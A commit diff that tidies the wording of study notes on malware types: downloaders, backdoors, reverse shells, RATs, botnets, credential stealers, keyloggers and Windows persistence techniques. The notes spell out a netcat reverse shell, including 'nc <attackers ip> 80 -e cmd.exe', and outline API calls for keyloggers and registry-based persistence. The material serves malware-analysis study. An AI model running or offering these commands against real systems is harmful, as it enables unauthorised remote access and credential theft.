Tidy up
This commit is contained in:
103 files changed
+3663
-3779
No files matched your search
@@ -5,7 +5,7 @@
|
||||
*Downloaders* simply download another piece of malware from the internet and execute it on the local system. Downloaders are often packaged with an exploit.
|
||||
|
||||
- Downloaders often use `URLDownloadToFileA`
|
||||
- Followed by a called to `WinExec`
|
||||
- Followed by a call to `WinExec`
|
||||
- To download and execute the new malware
|
||||
- Are often called *droppers*
|
||||
|
||||
@@ -17,20 +17,20 @@ A launcher is any executable that installs malware for immediate or future cover
|
||||
|
||||
### Backdoors
|
||||
|
||||
A *backdoor* is a type of malware that provides an attacker with remote access to a victims machine. Backdoor code often implements a full set of capabilities so when using a backdoor, attackers don't need to download additional malware or code.
|
||||
A *backdoor* is a type of malware that provides an attacker with remote access to a victim’s machine. Backdoor code often implements a full set of capabilities so when using a backdoor, attackers don't need to download additional malware or code.
|
||||
|
||||
- Common variants
|
||||
- Reverse Shells
|
||||
- Remote Access Trojans (RATs)
|
||||
- Botnets
|
||||
- Reverse Shells
|
||||
- Remote Access Trojans (RATs)
|
||||
- Botnets
|
||||
- Commonly communicate over port 80 using `HTTP`
|
||||
- `HTTP` is the most commonly used protocol for outgoing network traffic
|
||||
- So it offers the malware the best chance of blending in to normal traffic
|
||||
- `HTTP` is the most commonly used protocol for outgoing network traffic
|
||||
- So it offers the malware the best chance of blending in to normal traffic
|
||||
- Often provide a common set of functionality
|
||||
- Manipulate registry keys
|
||||
- Enumerate display windows
|
||||
- Create directories
|
||||
- Search for files
|
||||
- Manipulate registry keys
|
||||
- Enumerate display windows
|
||||
- Create directories
|
||||
- Search for files
|
||||
- Can determine the functionality provided by looking at the Windows API functions imported
|
||||
|
||||
#### Reverse Shell
|
||||
@@ -38,11 +38,11 @@ A *backdoor* is a type of malware that provides an attacker with remote access t
|
||||
A reverse shell is a connection that originates from an infected machine and provides attackers shell access to that machine.
|
||||
|
||||
- The simplest type of backdoor
|
||||
- Provides attack with standard shell
|
||||
- Provides the attacker with a standard shell
|
||||
- Offers same functionality as being logged into the machine
|
||||
- Called a reverse shell because rather than the attacker connecting to the infected machine, the infected machine connects back to the attackers machine
|
||||
- This is done as the victim's machine is often sitting behind a firewall blocking incoming traffic on most ports.
|
||||
- Whereas outgoing traffic on random high number ports is often unblocked
|
||||
- Called a reverse shell because rather than the attacker connecting to the infected machine, the infected machine connects back to the attacker’s machine
|
||||
- This is done as the victim's machine is often sitting behind a firewall blocking incoming traffic on most ports.
|
||||
- Whereas outgoing traffic on random high-numbered ports is often unblocked
|
||||
- Either offered standalone or as part of a more sophisticated backdoor
|
||||
|
||||
##### Creating a reverse shell
|
||||
@@ -51,44 +51,48 @@ A reverse shell is a connection that originates from an infected machine and pro
|
||||
|
||||
- Can be created quite simply using the `netcat` program
|
||||
|
||||
- This is done by setting up a listener on the attackers machine
|
||||
- This is done by setting up a listener on the attacker’s machine
|
||||
|
||||
- ```bash
|
||||
nc -l -p 80
|
||||
```
|
||||
- Example:
|
||||
|
||||
- Where `-l` is the listen flag and `-p` is the port flag to listen on 80
|
||||
```bash
|
||||
nc -l -p 80
|
||||
```
|
||||
|
||||
- Then netcat is run on the victims machine
|
||||
- Where `-l` is the listen flag and `-p` is the port flag to listen on 80
|
||||
|
||||
- ```bash
|
||||
nc <attackers ip> 80 -e cmd.exe
|
||||
```
|
||||
- Then netcat is run on the victim’s machine
|
||||
|
||||
- The `-e` option is the program to execute over the connection once the connection is established
|
||||
- Example:
|
||||
|
||||
- Tying std input and std output from the program to the network socket
|
||||
```bash
|
||||
nc <attackers ip> 80 -e cmd.exe
|
||||
```
|
||||
|
||||
- The `-e` option is the program to execute over the connection once the connection is established
|
||||
|
||||
- Tying std input and std output from the program to the network socket
|
||||
|
||||
###### Using Windows API
|
||||
|
||||
This can be done in two ways: basic and multi-threaded
|
||||
This can be done in two ways: basic and multi-threaded
|
||||
|
||||
The **basic** method is popular as is easy to write and achieves the same thing.
|
||||
The **basic** method is popular as it is easy to write and achieves the same thing.
|
||||
|
||||
It uses a call to `CreateProcess` and manipulates the `STARTUPINFO` structure.
|
||||
It uses a call to `CreateProcess` and manipulates the `STARTUPINFO` structure.
|
||||
|
||||
1. First a socket to the remote server is established
|
||||
2. That sockets standard streams are stored and spliced into `STARTUPINFO`
|
||||
3. So that when `CreateProcess` is called with the `STARTUPINFO` passed in, standard input, output and error is piped to the attacker
|
||||
1. First a socket to the remote server is established
|
||||
2. That socket’s standard streams are stored and spliced into `STARTUPINFO`
|
||||
3. So that when `CreateProcess` is called with the `STARTUPINFO` passed in, standard input, output and error are piped to the attacker
|
||||
|
||||
The multithreaded approach is the same, except instead of tying the streams from command line directly to the socket, two threads sit inbetween (one for input, one for output) . These threads can be used to encrypt and decrypt data so is not sent in the clear.
|
||||
The multithreaded approach is the same, except instead of tying the streams from the command line directly to the socket, two threads sit in between (one for input, one for output). These threads can be used to encrypt and decrypt data so it is not sent in the clear.
|
||||
|
||||
- API calls `CreateThread` and `CreatePipe` should be looked for
|
||||
- The two pipes are needed to redirect input and output to the thread
|
||||
- Two threads are needed
|
||||
- One for reading from the stdin pipe and writing to the socket
|
||||
- One for reading from the socket and writing to the stdout pipe
|
||||
- Then the `CreateProcess` method can be used to tie the standard streams to the pipes instead of directly to the socket.
|
||||
- The two pipes are needed to redirect input and output to the thread
|
||||
- Two threads are needed
|
||||
- One for reading from the stdin pipe and writing to the socket
|
||||
- One for reading from the socket and writing to the stdout pipe
|
||||
- Then the `CreateProcess` method can be used to tie the standard streams to the pipes instead of directly to the socket.
|
||||
|
||||
### Remote Administration Tool (RAT)
|
||||
|
||||
@@ -100,7 +104,7 @@ The multithreaded approach is the same, except instead of tying the streams from
|
||||
|
||||

|
||||
|
||||
Server will poll the client for new commands - there is not a permanent connection (as to not arouse suspicion)
|
||||
Server will poll the client for new commands - there is not a permanent connection (so as not to arouse suspicion)
|
||||
|
||||
### Botnet
|
||||
|
||||
@@ -112,21 +116,21 @@ Server will poll the client for new commands - there is not a permanent connecti
|
||||
| ------------------------------ | ------------------------------ |
|
||||
| Typically control fewer hosts | Infect millions |
|
||||
| Used in targeted attacks | Used in mass attack |
|
||||
| Controlled on per-victim level | All zombies controlled as once |
|
||||
| Controlled on per-victim level | All zombies controlled at once |
|
||||
|
||||
### Credential Stealing
|
||||
|
||||
- Attackers will go to great lengths to steal credentials
|
||||
- Three general approaches
|
||||
- Programs that waits for a user to log in
|
||||
- Programs that dump information stored in Windows (e.g password hashes)
|
||||
- Programs that log keystrokes
|
||||
- Programs that wait for a user to log in
|
||||
- Programs that dump information stored in Windows (e.g password hashes)
|
||||
- Programs that log keystrokes
|
||||
|
||||
#### Windows Login
|
||||
|
||||
- Windows enables you to extend the login mechanism
|
||||
- In windows XP, this was done by *Graphical Identification* *and Authentication* (GINA) API
|
||||
- Later windows versions use *Credential Provider*
|
||||
- In Windows XP, this was done by the *Graphical Identification* *and Authentication* (GINA) API
|
||||
- Later Windows versions use *Credential Provider*
|
||||
- Possible to use these to install credential stealers by pretending to be a credential provider
|
||||
|
||||
Place a piece of code between `winlogin.exe` and `magina.dll`. By changing the `dll` to a malicious one.
|
||||
@@ -142,27 +146,27 @@ Place a piece of code between `winlogin.exe` and `magina.dll`. By changing the `
|
||||
### Keyloggers
|
||||
|
||||
- Intercepting Windows login or hash dumping will only provide details of the username and password to log into the computer
|
||||
- Will not provide details of other resources
|
||||
- Will not provide details of other resources
|
||||
- Alternative approach is to log user key presses
|
||||
- This will capture any password typed into the system
|
||||
- Keyloggers can be implemented in both kernel space and user space
|
||||
- Kernel based is very difficult to detected with user level applications
|
||||
- Frequently used as part of a root kit
|
||||
- Act as a keyboard driver to capture keystrokes bypasses user-space programs and protections
|
||||
- Kernel-based is very difficult to detect with user-level applications
|
||||
- Frequently used as part of a rootkit
|
||||
- Acting as a keyboard driver to capture keystrokes bypasses user-space programs and protections
|
||||
|
||||
#### User-space keyloggers
|
||||
|
||||
- Windows API provides two ways to implement a keylogger in user-space
|
||||
- Hooking - get windows to notify the malware every time a key is pressed
|
||||
- Hooking typically makes use of `SetWindowsHookEx()`
|
||||
- Can alter key presses as well
|
||||
- Typically will include `.exe` which will intiate the hook function
|
||||
- And a `dll` to handle the logging
|
||||
- This `dll` is injected to other processes on the system
|
||||
- Polling - malware interrogrates Windows to see if a specific key is pressed
|
||||
- Make use of the `GetAsyncKeyState()` API function which returns a boolean
|
||||
- All the keys are iterated through to see what specific key is pressed
|
||||
- `GetForegroundWindow()` - shows window title
|
||||
- Hooking - get Windows to notify the malware every time a key is pressed
|
||||
- Hooking typically makes use of `SetWindowsHookEx()`
|
||||
- Can alter key presses as well
|
||||
- Typically will include an `.exe` which will initiate the hook function
|
||||
- And a `dll` to handle the logging
|
||||
- This `dll` is injected to other processes on the system
|
||||
- Polling - malware interrogates Windows to see if a specific key is pressed
|
||||
- Make use of the `GetAsyncKeyState()` API function which returns a boolean
|
||||
- All the keys are iterated through to see what specific key is pressed
|
||||
- `GetForegroundWindow()` - shows window title
|
||||
|
||||
###### Identifying Keyloggers
|
||||
|
||||
@@ -180,7 +184,7 @@ Place a piece of code between `winlogin.exe` and `magina.dll`. By changing the `
|
||||
|
||||
- Various places in the Windows Registry that can be used to install malware permanently
|
||||
- Most popular is to register under:
|
||||
- `HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run`
|
||||
- `HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run`
|
||||
- Tools available that can show all the programs that will automatically run on your system
|
||||
- Note that the mechanisms available change as Windows develops
|
||||
|
||||
@@ -189,7 +193,7 @@ Place a piece of code between `winlogin.exe` and `magina.dll`. By changing the `
|
||||
- One option is the image File Execution Options in the registry
|
||||
- Aimed at letting you debug a program
|
||||
- Set at:
|
||||
- `HKLM\Software\Microsoft\Windows NT\CurrentVersion\ImageFileExecution Options\{exe}`
|
||||
- `HKLM\Software\Microsoft\Windows NT\CurrentVersion\ImageFileExecution Options\{exe}`
|
||||
- Can set a key here called debugger which contains the full path to the debugger (or your malware)
|
||||
- Set this on a program that is likely to run and the malware will be launched when the program is run
|
||||
- Can also be used for malware analysis
|
||||
@@ -197,7 +201,7 @@ Place a piece of code between `winlogin.exe` and `magina.dll`. By changing the `
|
||||
###### SVCHOST DLLs
|
||||
|
||||
- Malware often installed as a Windows service
|
||||
- But typically requires implementing as a `exe`
|
||||
- But typically requires implementing as an `exe`
|
||||
- However, Windows provides `svchost.exe` that lets you implement a service as a `dll`
|
||||
- Many Windows services are implemented as a `DLL` using `svchost.exe`
|
||||
- Causes the malware to blend into the process list and registry better
|
||||
- Causes the malware to blend into the process list and registry better
|
||||
Reference in new issue
Block a user